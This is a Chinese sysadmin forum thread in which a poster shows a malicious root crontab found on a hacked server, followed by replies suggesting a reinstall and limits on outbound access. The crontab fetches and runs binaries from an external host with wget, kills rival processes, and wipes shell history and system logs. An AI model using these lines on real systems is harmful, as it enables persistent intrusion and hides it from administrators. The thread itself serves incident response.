前几天服务器被放了几只小强

laoadiy

发现真TM恶心/刚入职就让我去逮小强/
流量监测正常应用在30M左右，结果列发现一下到了800M，然后过会儿会下去到正常值
登陆服务器发现last /history没有日志，在/var/spool/cron下多了一个root.1文件，打开一看，果然是crontab的东西
结果到指定的目录看了一下sfewfesfs文件有，查看服务器吃内存CPU最高的有都有，往外ping包的时候提示full，
[root@example home]# grep -v "#" root.1 |grep -v "^$"
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 sdmfdsfhjfe
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 sdmfdsfhjfe
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 ferwfrre
*/94 * * * * killall -9 dsfrefr
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhjrtfyhuf
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sfewfesfs
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sdmfdsfhjfe
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/gfhddsfew
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/rewgtf3er4t
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ferwfrre
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/dsfrefr
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir dsfrefr
*/360 * * * * cd /etc;rm -rf dir sdmfdsfhjfe
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir gfhddsfew
*/360 * * * * cd /etc;rm -rf dir ferwfrre
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir dsfrefr.*
*/1 * * * * cd /etc;rm -rf dir sdmfdsfhjfe.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir gfhddsfew.*
*/1 * * * * cd /etc;rm -rf dir ferwfrre.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/dsfrefr
*/1 * * * * chmod 7777 /etc/sdmfdsfhjfe
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/gfhddsfew
*/1 * * * * chmod 7777 /etc/ferwfrre
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/sdmfdsfhjfe > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1&
*/95 * * * * nohup /etc/dsfrefr > /dev/null 2>&1&
*/1 * * * * echo "unset MAILCHECK" >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c

typuc

之前遇到过类似，一个服务器被用来挖比特币了。建议限制服务器访问公网，只开放业务公网。

Hugo801122

好厉害，弱弱的问一句，什么事小强啊！

action08

线上环境好少啊，感觉确实锻炼的机会

Shell_HAT

这是学习的好机会呀

whyliyi

楼主最后怎么解决的？我们也中招了，进程杀不掉，文件删不掉，怎么办？

humjb_1983

whyliyi 发表于 2014-06-26 08:40
楼主最后怎么解决的？我们也中招了，进程杀不掉，文件删不掉，怎么办？

"进程杀不掉，文件删不掉"--具体现象是啥?

laoadiy

这个东西基本上就是copy一下重要文件，然后重新安装系统回复 6# whyliyi


   

ibpoqdi

握手，我也中了

chenyx

这种情况下重新安装是最保险的.
不过,重新安装之前要分析入侵的过程